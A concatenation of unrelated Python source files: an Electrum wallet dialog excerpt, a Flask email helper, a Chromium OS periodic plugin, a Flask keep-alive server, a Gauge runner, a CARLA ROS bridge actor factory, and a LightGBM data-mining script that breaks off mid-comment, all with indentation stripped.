def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
except CannotDoubleSpendTx as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
email.py
|
from threading import Thread
from flask import current_app
from flask_mail import Message
from app import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body,
attachments=None, sync=False):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
if attachments:
for attachment in attachments:
msg.attach(*attachment)
if sync:
mail.send(msg)
else:
Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()
|
periodic_plugin.py
|
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import threading
from cros.factory.goofy.plugins import plugin
from cros.factory.utils import debug_utils
from cros.factory.utils import process_utils
from cros.factory.utils import type_utils
class PeriodicPlugin(plugin.Plugin):
"""Plugins that runs specific task periodically.
A common implementation of `cros.factory.goofy.plugins` that run a specific
task periodically.
Subclass needs to implement `RunTask()`, which will be executed periodically
in a daemon thread.
"""
def __init__(self, goofy, period_secs,
used_resources=None, catch_exception=True):
"""Contructor of PeriodicPlugin.
Args:
period_secs: seconds between each run.
catch_exception: catch exceptions from `RunTask()` function or not. If
set to False, exception in `RunTask()` would cause the running thread
to crash, and the following periodic task would be stopped.
"""
super(PeriodicPlugin, self).__init__(goofy, used_resources)
self._thread = None
self._stop_event = threading.Event()
self._period_secs = period_secs
self._run_times = 0
self._run_task = self._RunTaskWithCatch if catch_exception else self.RunTask
@type_utils.Overrides
def OnStart(self):
self._stop_event.clear()
self._run_times = 0
self._thread = process_utils.StartDaemonThread(target=self._RunTarget)
def _RunTarget(self):
"""Periodically runs `RunTask()`."""
while not self._stop_event.wait(
self._period_secs if self._run_times else 0):
self._run_task()
self._run_times += 1
def RunTask(self):
"""Called periodically
Subclass need to implement this function.
"""
raise NotImplementedError
@debug_utils.CatchException('PeriodicPlugin')
def _RunTaskWithCatch(self):
"""Wrapper of `RunTask()` that catches any exception."""
self.RunTask()
@type_utils.Overrides
def OnStop(self):
self._stop_event.set()
|
keepalive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Ping"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
start.py
|
import logging
import os
import platform
import sys
import threading
from concurrent import futures
from os import path
import grpc
from getgauge import connection, processor
from getgauge import lsp_server
from getgauge.impl_loader import copy_skel_files
from getgauge.messages import lsp_pb2_grpc
from getgauge.static_loader import load_files
from getgauge.util import get_step_impl_dir
PLUGIN_JSON = 'python.json'
VERSION = 'version'
def main():
_init_logger()
logging.info("Python: {}".format(platform.python_version()))
if sys.argv[1] == "--init":
copy_skel_files()
else:
load_implementations()
start()
def load_implementations():
d = get_step_impl_dir()
if path.exists(d):
load_files(d)
else:
logging.error('can not load implementations from {}. {} does not exist.'.format(d, d))
def start():
if os.getenv('GAUGE_LSP_GRPC'):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))
p = server.add_insecure_port('127.0.0.1:0')
handler = lsp_server.LspServerHandler(server)
lsp_pb2_grpc.add_lspServiceServicer_to_server(handler, server)
logging.info('Listening on port:{}'.format(p))
server.start()
wait_thread = threading.Thread(name="listener", target=handler.wait_till_terminated)
wait_thread.start()
wait_thread.join()
else:
s = connection.connect()
processor.dispatch_messages(s)
def _init_logger():
if os.getenv('IS_DAEMON'):
f = '%(asctime)s.%(msecs)03d %(message)s'
logging.basicConfig(stream=sys.stdout, format=f, level=logging.DEBUG, datefmt='%H:%M:%S')
else:
logging.basicConfig(stream=sys.stdout, format='%(message)s', level=logging.DEBUG)
if __name__ == '__main__':
main()
|
actor_factory.py
|
#!/usr/bin/env python
#
# Copyright (c) 2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
import itertools
try:
import queue
except ImportError:
import Queue as queue
import time
from enum import Enum
from threading import Thread, Lock
import carla
import numpy as np
import carla_common.transforms as trans
from carla_ros_bridge.actor import Actor
from carla_ros_bridge.actor_control import ActorControl
from carla_ros_bridge.actor_list_sensor import ActorListSensor
from carla_ros_bridge.camera import Camera, RgbCamera, DepthCamera, SemanticSegmentationCamera, DVSCamera, FisheyeCamera
from carla_ros_bridge.collision_sensor import CollisionSensor
from carla_ros_bridge.ego_vehicle import EgoVehicle
from carla_ros_bridge.gnss import Gnss
from carla_ros_bridge.imu import ImuSensor
from carla_ros_bridge.lane_invasion_sensor import LaneInvasionSensor
from carla_ros_bridge.lidar import Lidar, SemanticLidar
from carla_ros_bridge.marker_sensor import MarkerSensor
from carla_ros_bridge.object_sensor import ObjectSensor
from carla_ros_bridge.odom_sensor import OdometrySensor
from carla_ros_bridge.opendrive_sensor import OpenDriveSensor
from carla_ros_bridge.pseudo_actor import PseudoActor
from carla_ros_bridge.radar import Radar
from carla_ros_bridge.rss_sensor import RssSensor
from carla_ros_bridge.sensor import Sensor
from carla_ros_bridge.spectator import Spectator
from carla_ros_bridge.speedometer_sensor import SpeedometerSensor
from carla_ros_bridge.tf_sensor import TFSensor
from carla_ros_bridge.traffic import Traffic, TrafficLight
from carla_ros_bridge.traffic_lights_sensor import TrafficLightsSensor
from carla_ros_bridge.vehicle import Vehicle
from carla_ros_bridge.walker import Walker
# to generate a random spawning position or vehicles
import random
secure_random = random.SystemRandom()
class ActorFactory(object):
TIME_BETWEEN_UPDATES = 0.1
class TaskType(Enum):
SPAWN_ACTOR = 0
SPAWN_PSEUDO_ACTOR = 1
DESTROY_ACTOR = 2
def __init__(self, node, world, sync_mode=False):
self.node = node
self.world = world
self.blueprint_lib = self.world.get_blueprint_library()
self.spawn_points = self.world.get_map().get_spawn_points()
self.sync_mode = sync_mode
self._active_actors = set()
self.actors = {}
self._task_queue = queue.Queue()
self._known_actor_ids = [] # used to immediately reply to spawn_actor/destroy_actor calls
self.lock = Lock()
self.spawn_lock = Lock()
# id generator for pseudo sensors
self.id_gen = itertools.count(10000)
self.thread = Thread(target=self._update_thread)
def start(self):
# create initially existing actors
self.update_available_objects()
self.thread.start()
def _update_thread(self):
"""
execution loop for async mode actor discovery
"""
while not self.node.shutdown.is_set():
time.sleep(ActorFactory.TIME_BETWEEN_UPDATES)
self.world.wait_for_tick()
self.update_available_objects()
def update_available_objects(self):
"""
update the available actors
"""
# The carla.World.get_actors() method does not return actors that has been spawned in the same frame.
# This is a known bug and will be fixed in future release of CARLA.
current_actors = set([actor.id for actor in self.world.get_actors()])
spawned_actors = current_actors - self._active_actors
destroyed_actors = self._active_actors - current_actors
self._active_actors = current_actors
# Create/destroy actors not managed by the bridge.
self.lock.acquire()
for actor_id in spawned_actors:
carla_actor = self.world.get_actor(actor_id)
if self.node.parameters["register_all_sensors"] or not isinstance(carla_actor, carla.Sensor):
self._create_object_from_actor(carla_actor)
for actor_id in destroyed_actors:
self._destroy_object(actor_id, delete_actor=False)
# Create/destroy objects managed by the bridge.
with self.spawn_lock:
while not self._task_queue.empty():
task = self._task_queue.get()
task_type = task[0]
actor_id, req = task[1]
if task_type == ActorFactory.TaskType.SPAWN_ACTOR and not self.node.shutdown.is_set():
carla_actor = self.world.get_actor(actor_id)
self._create_object_from_actor(carla_actor, req)
elif task_type == ActorFactory.TaskType.SPAWN_PSEUDO_ACTOR and not self.node.shutdown.is_set():
self._create_object(actor_id, req.type, req.id, req.attach_to, req.transform)
elif task_type == ActorFactory.TaskType.DESTROY_ACTOR:
self._destroy_object(actor_id, delete_actor=True)
self.lock.release()
def update_actor_states(self, frame_id, timestamp):
"""
update the state of all known actors
"""
with self.lock:
for actor_id in self.actors:
try:
self.actors[actor_id].update(frame_id, timestamp)
except RuntimeError as e:
self.node.logwarn("Update actor {}({}) failed: {}".format(
self.actors[actor_id].__class__.__name__, actor_id, e))
continue
def clear(self):
for _, actor in self.actors.items():
actor.destroy()
self.actors.clear()
def spawn_actor(self, req):
"""
spawns an object
No object instances are created here. Instead carla-actors are created,
and pseudo objects are appended to a list to get created later.
"""
with self.spawn_lock:
if "pseudo" in req.type:
# only allow spawning pseudo objects if parent actor already exists in carla
if req.attach_to != 0:
carla_actor = self.world.get_actor(req.attach_to)
if carla_actor is None:
raise IndexError("Parent actor {} not found".format(req.attach_to))
id_ = next(self.id_gen)
self._task_queue.put((ActorFactory.TaskType.SPAWN_PSEUDO_ACTOR, (id_, req)))
else:
id_ = self._spawn_carla_actor(req)
self._task_queue.put((ActorFactory.TaskType.SPAWN_ACTOR, (id_, req)))
self._known_actor_ids.append(id_)
return id_
def destroy_actor(self, uid):
def get_objects_to_destroy(uid):
objects_to_destroy = []
if uid in self._known_actor_ids:
objects_to_destroy.append(uid)
self._known_actor_ids.remove(uid)
# remove actors that have the actor to be removed as parent.
for actor in list(self.actors.values()):
if actor.parent is not None and actor.parent.uid == uid:
objects_to_destroy.extend(get_objects_to_destroy(actor.uid))
return objects_to_destroy
with self.spawn_lock:
objects_to_destroy = set(get_objects_to_destroy(uid))
for obj in objects_to_destroy:
self._task_queue.put((ActorFactory.TaskType.DESTROY_ACTOR, (obj, None)))
return objects_to_destroy
def _spawn_carla_actor(self, req):
"""
spawns an actor in carla
"""
if "*" in req.type:
blueprint = secure_random.choice(
self.blueprint_lib.filter(req.type))
else:
blueprint = self.blueprint_lib.find(req.type)
blueprint.set_attribute('role_name', req.id)
for attribute in req.attributes:
blueprint.set_attribute(attribute.key, attribute.value)
if req.random_pose is False:
transform = trans.ros_pose_to_carla_transform(req.transform)
else:
# get a random pose
transform = secure_random.choice(
self.spawn_points) if self.spawn_points else carla.Transform()
attach_to = None
if req.attach_to != 0:
attach_to = self.world.get_actor(req.attach_to)
if attach_to is None:
raise IndexError("Parent actor {} not found".format(req.attach_to))
carla_actor = self.world.spawn_actor(blueprint, transform, attach_to)
return carla_actor.id
def _create_object_from_actor(self, carla_actor, req=None):
"""
create a object for a given carla actor
Creates also the object for its parent, if not yet existing
"""
parent = None
# the transform relative to the map
relative_transform = trans.carla_transform_to_ros_pose(carla_actor.get_transform())
if carla_actor.parent:
if carla_actor.parent.id in self.actors:
parent = self.actors[carla_actor.parent.id]
else:
parent = self._create_object_from_actor(carla_actor.parent)
if req is not None:
relative_transform = req.transform
else:
# calculate relative transform to the parent
actor_transform_matrix = trans.ros_pose_to_transform_matrix(relative_transform)
parent_transform_matrix = trans.ros_pose_to_transform_matrix(
trans.carla_transform_to_ros_pose(carla_actor.parent.get_transform()))
relative_transform_matrix = np.matrix(
parent_transform_matrix).getI() * np.matrix(actor_transform_matrix)
relative_transform = trans.transform_matrix_to_ros_pose(relative_transform_matrix)
parent_id = 0
if parent is not None:
parent_id = parent.uid
name = carla_actor.attributes.get("role_name", "")
if not name:
name = str(carla_actor.id)
obj = self._create_object(carla_actor.id, carla_actor.type_id, name,
parent_id, relative_transform, carla_actor)
return obj
def _destroy_object(self, actor_id, delete_actor):
if actor_id not in self.actors:
return
actor = self.actors[actor_id]
del self.actors[actor_id]
carla_actor = None
if isinstance(actor, Actor):
carla_actor = actor.carla_actor
actor.destroy()
if carla_actor and delete_actor:
carla_actor.destroy()
self.node.loginfo("Removed {}(id={})".format(actor.__class__.__name__, actor.uid))
def get_pseudo_sensor_types(self):
pseudo_sensors = []
for cls in PseudoActor.__subclasses__():
if cls.__name__ != "Actor":
pseudo_sensors.append(cls.get_blueprint_name())
return pseudo_sensors
def _create_object(self, uid, type_id, name, attach_to, spawn_pose, carla_actor=None):
# check that the actor is not already created.
if carla_actor is not None and carla_actor.id in self.actors:
return None
if attach_to != 0:
if attach_to not in self.actors:
raise IndexError("Parent object {} not found".format(attach_to))
parent = self.actors[attach_to]
else:
parent = None
if type_id == TFSensor.get_blueprint_name():
actor = TFSensor(uid=uid, name=name, parent=parent, node=self.node)
elif type_id == OdometrySensor.get_blueprint_name():
actor = OdometrySensor(uid=uid,
name=name,
parent=parent,
node=self.node)
elif type_id == SpeedometerSensor.get_blueprint_name():
actor = SpeedometerSensor(uid=uid,
name=name,
parent=parent,
node=self.node)
elif type_id == MarkerSensor.get_blueprint_name():
actor = MarkerSensor(uid=uid,
name=name,
parent=parent,
node=self.node,
actor_list=self.actors,
world=self.world)
elif type_id == ActorListSensor.get_blueprint_name():
actor = ActorListSensor(uid=uid,
name=name,
parent=parent,
node=self.node,
actor_list=self.actors)
elif type_id == ObjectSensor.get_blueprint_name():
actor = ObjectSensor(
uid=uid,
name=name,
parent=parent,
node=self.node,
actor_list=self.actors,
)
elif type_id == TrafficLightsSensor.get_blueprint_name():
actor = TrafficLightsSensor(
uid=uid,
name=name,
parent=parent,
node=self.node,
actor_list=self.actors,
)
elif type_id == OpenDriveSensor.get_blueprint_name():
actor = OpenDriveSensor(uid=uid,
name=name,
parent=parent,
node=self.node,
carla_map=self.world.get_map())
elif type_id == ActorControl.get_blueprint_name():
actor = ActorControl(uid=uid,
name=name,
parent=parent,
node=self.node)
elif carla_actor.type_id.startswith('traffic'):
if carla_actor.type_id == "traffic.traffic_light":
actor = TrafficLight(uid, name, parent, self.node, carla_actor)
else:
actor = Traffic(uid, name, parent, self.node, carla_actor)
elif carla_actor.type_id.startswith("vehicle"):
if carla_actor.attributes.get('role_name')\
in self.node.parameters['ego_vehicle']['role_name']:
actor = EgoVehicle(
uid, name, parent, self.node, carla_actor,
self.node._ego_vehicle_control_applied_callback)
else:
actor = Vehicle(uid, name, parent, self.node, carla_actor)
elif carla_actor.type_id.startswith("sensor"):
if carla_actor.type_id.startswith("sensor.camera"):
if carla_actor.type_id.startswith("sensor.camera.rgb"):
actor = RgbCamera(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.camera.depth"):
actor = DepthCamera(uid, name, parent, spawn_pose,
self.node, carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith(
"sensor.camera.semantic_segmentation"):
actor = SemanticSegmentationCamera(uid, name, parent,
spawn_pose, self.node,
carla_actor,
self.sync_mode)
elif carla_actor.type_id.startswith("sensor.camera.dvs"):
actor = DVSCamera(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.camera.fisheye"):
actor = FisheyeCamera(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
else:
actor = Camera(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.lidar"):
if carla_actor.type_id.endswith("sensor.lidar.ray_cast"):
actor = Lidar(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.endswith(
"sensor.lidar.ray_cast_semantic"):
actor = SemanticLidar(uid, name, parent, spawn_pose,
self.node, carla_actor,
self.sync_mode)
elif carla_actor.type_id.startswith("sensor.other.radar"):
actor = Radar(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.other.gnss"):
actor = Gnss(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.other.imu"):
actor = ImuSensor(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.other.collision"):
actor = CollisionSensor(uid, name, parent, spawn_pose,
self.node, carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.other.rss"):
actor = RssSensor(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.other.lane_invasion"):
actor = LaneInvasionSensor(uid, name, parent, spawn_pose,
self.node, carla_actor,
self.sync_mode)
else:
actor = Sensor(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("spectator"):
actor = Spectator(uid, name, parent, self.node, carla_actor)
elif carla_actor.type_id.startswith("walker"):
actor = Walker(uid, name, parent, self.node, carla_actor)
else:
actor = Actor(uid, name, parent, self.node, carla_actor)
self.actors[actor.uid] = actor
self.node.loginfo("Created {}(id={})".format(actor.__class__.__name__, actor.uid))
return actor
|
concrete.py
|
# -*- coding: utf-8 -*-
# @Author: gunjianpan
# @Date: 2019-03-04 19:03:49
# @Last Modified by: gunjianpan
# @Last Modified time: 2019-03-28 10:26:48
import lightgbm as lgb
import numpy as np
import pandas as pd
import warnings
import threading
import time
from datetime import datetime
from numba import jit
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score
from util.util import *
warnings.filterwarnings('ignore')
data_path = 'concrete/data/'
model_path = 'concrete/model/'
pickle_path = 'concrete/pickle/'
prediction_path = 'concrete/prediction/'
v = '2'
# t = '_total'
t = ''
class Concrete(object):
"""
data minie for concrete
"""
def __init__(self, do_pre=False):
self.id2file = {}
self.id2lab = {}
self.detail_map = {}
self.detail_pickle = {}
self.f1_max_index = 0.5
self.f1_map = {index: 0 for index in range(0, 5)}
self.version = datetime.now().strftime("%m%d%H%M")
self.seed = 333
self.EARLY_STOP = 300
self.OPT_ROUNDS = 2444
self.MAX_ROUNDS = 300000
self.evaluate_num = 0
self.params = {
'boosting': 'gbdt',
'objective': 'binary',
'learning_rate': 0.01,
'max_depth': -1,
'min_child_samples': 20,
'max_bin': 255,
'subsample': 0.85,
'subsample_freq': 10,
'colsample_bytree': 0.8,
'min_child_weight': 0.001,
'subsample_for_bin': 200000,
'min_split_gain': 0,
'reg_alpha': 0,
'reg_lambda': 0,
'num_leaves': 63,
'seed': self.seed,
'nthread': 20,
'metric': "None",
"verbose": -1
}
self.pre_data_list(do_pre)
def load_basic(self, file_type):
"""
load basic
@param file_type: 1-submit_example, 0-train_labels
"""
file_name = 'submit_example' if file_type else 'train_labels'
file_name += '.csv'
with open(data_path + file_name, 'r') as f:
train_list = f.readlines()[1:]
self.id2file = {
index: train[:-1].split(',')[0] for index, train in enumerate(train_list)}
self.id2lab = {index: int(train[:-1].split(',')[1])
for index, train in enumerate(train_list)}
def load_detail(self, file_type, block_size=500):
"""
load detail
@param file_type: 1-submit_example, 0-train_labels
"""
pickle_file = 'submit_middle' if file_type else 'train_middle'
pickle_file += '.pickle'
detail_pickle = load_bigger(pickle_path + pickle_file)
print('load over')
id_len = len(self.id2lab.keys())
for block_index in range((id_len - 1) // block_size + 1):
index_min = block_size * block_index
index_max = min(id_len, (block_index + 1) * block_size)
threadings = []
for index in list(self.id2file.keys())[index_min:index_max]:
label_id = self.id2lab[index]
detail_csv = detail_pickle[index]
work = threading.Thread(
target=self.pre_data_once, args=(index, file_type, label_id, detail_csv,))
threadings.append(work)
for work in threadings:
work.start()
for work in threadings:
work.join()
if not index_max % 10:
print(index_max)
detail_map = [self.detail_map[k]
for k in sorted(self.detail_map.keys())]
output_file = 'submit_middle' if file_type else 'train_middle'
title_basic = ['活塞工作时长', '发动机转速', '油泵转速', '泵送压力', '液压油温', '流量档位',
'分配压力', '排量电流', '低压开关', '高压开关', '搅拌超压信号', '正泵', '反泵', '设备类型']
# title_min = [index + '_min'for index in title_basic[1:8]]
# title_max = [index + '_max'for index in title_basic[1:8]]
# title_mean = [index + '_mean'for index in title_basic[1:8]]
# title_std = [index + '_std'for index in title_basic[1:8]]
# title_poor = [index + '_poor'for index in title_basic[1:8]]
# title_median = [index + '_median'for index in title_basic[1:8]]
# title_total = [index + '_total'for index in title_basic[1:8]]
# title_hit = [index + '_hit'for index in title_basic[1:8]]
# title_constant = ['label', '活塞工作时长', '低压开关', '正泵', '设备类型', '低压开关&正泵']
# title_collection = [*title_min, *title_mean, *title_max, *title_poor, *title_std, *title_median, *title_total, *title_hit]
# title_collection_diff = [index + '_diff' for index in title_collection]
# title_collection_diff_diff = [
# index + '_diff_diff' for index in title_collection]
# title_collection_diff_diff_diff = [
# index + '_diff_diff_diff' for index in title_collection]
# title_collection_diff_diff_diff2 = [
# index + '_diff_diff_diff2' for index in title_collection]
# title_collection_diff_diff_diff3 = [
# index + '_diff_diff_diff3' for index in title_collection]
# title_collection_ptr = [index + '_pct' for index in title_collection]
# title_collection_ptr_diff = [
# index + '_pct_diff' for index in title_collection]
# title_all = [*title_constant, *title_collection, *title_collection_diff,
# *title_collection_diff_diff, *title_collection_diff_diff_diff,
# *title_collection_ptr, *title_collection_ptr_diff,
# *title_collection_diff_diff_diff2, *title_collection_diff_diff_diff3]
# title_all = [*title_collection_diff_diff_diff2, *title_collection_diff_diff_diff3]
title_skew = [index + '_skew'for index in title_basic[0:8]]
with open(data_path + output_file, 'w') as f:
f.write(",".join(title_skew) + '\n')
# f.write("nunique" + '\n')
f.write("\n".join([str(index) for index in detail_map]))
def load_all(self, file_type):
"""
load all
"""
self.load_basic(file_type)
self.load_detail(file_type)
self.detail_map = {}
def load_all_pickle(self, file_type):
"""
load all
"""
self.load_basic(file_type)
self.load_detail_pickle(file_type)
self.detail_pickle = {}
def load_detail_pickle(self, file_type, block_size=300):
"""
load detail
@param file_type: 1-submit_example, 0-train_labels
"""
id_len = len(self.id2lab.keys())
for block_index in range((id_len - 1) // block_size + 1):
index_min = block_size * block_index
index_max = min(id_len, (block_index + 1) * block_size)
threadings = []
for index in list(self.id2file.keys())[index_min:index_max]:
file_id = self.id2file[index]
work = threading.Thread(
target=self.pre_data_two, args=(index, file_type, file_id,))
threadings.append(work)
for work in threadings:
work.start()
for work in threadings:
work.join()
print(index_max)
output_file = 'submit_middle' if file_type else 'train_middle'
output_file += '.pickle'
dump_bigger(self.detail_pickle, pickle_path + output_file)
def pre_data_list(self, do_pre):
version = begin_time()
df_columns = pd.read_csv(data_path + 'train_middle_total').columns
begin_index = 0
with open(model_path + v + 'columns.csv', 'r') as f:
str_f = f.readline()
if str_f[-1] == '\n':
str_f = str_f[:-1]
good_columns = str_f.split(',')
with open(model_path + v + 'lastcolumn.csv', 'r') as f:
str_f = f.readline()
if str_f[-1] == '\n':
str_f = str_f[:-1]
while df_columns[begin_index] != str_f:
begin_index += 1
self.wait_columns = list(df_columns[begin_index + 6:])
self.good_columns = good_columns
self.basic_f1 = 0
if do_pre == True:
self.load_all(0)
self.load_all(1)
elif do_pre == 2:
self.load_all_pickle(0)
self.load_all_pickle(1)
else:
self.load_basic(1)
end_time(version)
def evaluate_f1(self, preds, train_data):
self.evaluate_num = self.evaluate_num + 1
labels = train_data.get_label()
if not self.evaluate_num % 50:
f1_list = [self.evaulate_model_once(labels, [int(indexs > (index / 100))
for indexs in preds]) for index in range(48, 53)]
max_index = f1_list.index(max(f1_list))
if max_index in self.f1_map:
self.f1_map[max_index] += 1
else:
self.f1_map[max_index] = 1
# print(labels, preds)
return 'f1', f1_list[2], True
else:
preds = [int(index > 0.5) for index in preds]
return 'f1', self.evaulate_model_once(labels, preds), True
def pre_data_two(self, detail_id, file_type, file_id):
file_folder = 'data_test' if file_type else 'data_train'
file_folder += '/'
file_folder += file_id
detail_csv = pd.read_csv(data_path + file_folder)
self.detail_pickle[detail_id] = detail_csv
def pre_data_once(self, detail_id, file_type, label_id, detail_csv):
# detail_basic = detail_csv.agg(['min', 'max', 'std', 'mean', 'median'])
# detail_max = detail_basic.iloc[1]
# detail_time = detail_csv.max()[0]
# detail_time = detail_max[0]
# detail_press = detail_max[8]
# detail_pump = detail_max[11]
# detail_type = detail_max[13]
# detail_add = detail_pump + detail_press
# detail_constant = [label_id, detail_time,
# detail_press, detail_pump, detail_type, detail_add]
# detail_max = detail_max[1:8]
# detail_min = detail_basic.iloc[0, 1:8]
# detail_poor = detail_max - detail_min
# detail_mean = detail_basic.iloc[3, 1:8]
# detail_std = detail_basic.iloc[2, 1:8]
# detail_median = detail_basic.iloc[4, 1:8]
# detail_total = [index * detail_time for index in detail_mean]
# detail_hit = [index * detail_time for index in detail_std]
# detail_collapse = [*detail_min, *detail_mean, *detail_max, *detail_poor,
# *detail_std, *detail_median, *detail_total, *detail_hit]
# del detail_csv['设备类型']
# detail_basic_diff = detail_csv.diff()
# detail_diff_basic = detail_basic_diff.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_diff_min = detail_diff_basic.iloc[0, 1:8]
# detail_diff_max = detail_diff_basic.iloc[1, 1:8]
# detail_diff_poor = detail_diff_max - detail_diff_min
# detail_diff_std = detail_diff_basic.iloc[2, 1:8]
# detail_diff_mean = detail_diff_basic.iloc[3, 1:8]
# detail_diff_median = detail_diff_basic.iloc[4, 1:8]
# detail_diff_total = [index * detail_time for index in detail_diff_mean]
# detail_diff_hit = [index * detail_time for index in detail_diff_std]
# detail_collapse_diff = [*detail_diff_min, *detail_diff_mean, *detail_diff_max, *detail_diff_poor,
# *detail_diff_std, *detail_diff_median, *detail_diff_total, *detail_diff_hit]
# detail_basic_diff_diff = detail_basic_diff.diff()
# detail_diff_diff_basic = detail_basic_diff_diff.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_diff_diff_min = detail_diff_diff_basic.iloc[0, 1:8]
# detail_diff_diff_max = detail_diff_diff_basic.iloc[1, 1:8]
# detail_diff_diff_poor = detail_diff_diff_max - detail_diff_diff_min
# detail_diff_diff_std = detail_diff_diff_basic.iloc[2, 1:8]
# detail_diff_diff_mean = detail_diff_diff_basic.iloc[3, 1:8]
# detail_diff_diff_median = detail_diff_diff_basic.iloc[4, 1:8]
# detail_diff_diff_total = [
# index * detail_time for index in detail_diff_diff_mean]
# detail_diff_diff_hit = [
# index * detail_time for index in detail_diff_diff_mean]
# detail_collapse_diff_diff = [*detail_diff_diff_min, *detail_diff_diff_mean, *detail_diff_diff_max,
# *detail_diff_diff_poor, *detail_diff_diff_std, *detail_diff_diff_median,
# *detail_diff_diff_total, *detail_diff_diff_hit]
# detail_basic_diff_diff_diff = detail_basic_diff_diff.diff()
# detail_diff_diff_diff_basic = detail_basic_diff_diff_diff.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_diff_diff_diff_min = detail_diff_diff_diff_basic.iloc[0, 1:8]
# detail_diff_diff_diff_max = detail_diff_diff_diff_basic.iloc[1, 1:8]
# detail_diff_diff_diff_poor = detail_diff_diff_diff_max - detail_diff_diff_diff_min
# detail_diff_diff_diff_std = detail_diff_diff_diff_basic.iloc[2, 1:8]
# detail_diff_diff_diff_mean = detail_diff_diff_diff_basic.iloc[3, 1:8]
# detail_diff_diff_diff_median = detail_diff_diff_diff_basic.iloc[4, 1:8]
# detail_diff_diff_diff_total = [
# index * detail_time for index in detail_diff_diff_diff_mean]
# detail_diff_diff_diff_hit = [
# index * detail_time for index in detail_diff_diff_diff_mean]
# detail_collapse_diff_diff_diff = [*detail_diff_diff_diff_min, *detail_diff_diff_diff_mean, *detail_diff_diff_diff_max,
# *detail_diff_diff_diff_poor, *detail_diff_diff_diff_std, *detail_diff_diff_diff_median,
# *detail_diff_diff_diff_total, *detail_diff_diff_diff_hit]
# detail_basic_diff_diff_diff2 = detail_basic_diff_diff_diff.diff()
# detail_diff_diff_diff2_basic = detail_basic_diff_diff_diff2.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_diff_diff_diff2_min = detail_diff_diff_diff2_basic.iloc[0, 1:8]
# detail_diff_diff_diff2_max = detail_diff_diff_diff2_basic.iloc[1, 1:8]
# detail_diff_diff_diff2_poor = detail_diff_diff_diff2_max - detail_diff_diff_diff2_min
# detail_diff_diff_diff2_std = detail_diff_diff_diff2_basic.iloc[2, 1:8]
# detail_diff_diff_diff2_mean = detail_diff_diff_diff2_basic.iloc[3, 1:8]
# detail_diff_diff_diff2_median = detail_diff_diff_diff2_basic.iloc[4, 1:8]
# detail_diff_diff_diff2_total = [
# index * detail_time for index in detail_diff_diff_diff2_mean]
# detail_diff_diff_diff2_hit = [
# index * detail_time for index in detail_diff_diff_diff2_mean]
# detail_collapse_diff_diff2_diff = [*detail_diff_diff_diff2_min, *detail_diff_diff_diff2_mean, *detail_diff_diff_diff2_max,
# *detail_diff_diff_diff2_poor, *detail_diff_diff_diff2_std, *detail_diff_diff_diff2_median,
# *detail_diff_diff_diff2_total, *detail_diff_diff_diff2_hit]
# detail_basic_diff_diff_diff3 = detail_basic_diff_diff_diff2.diff()
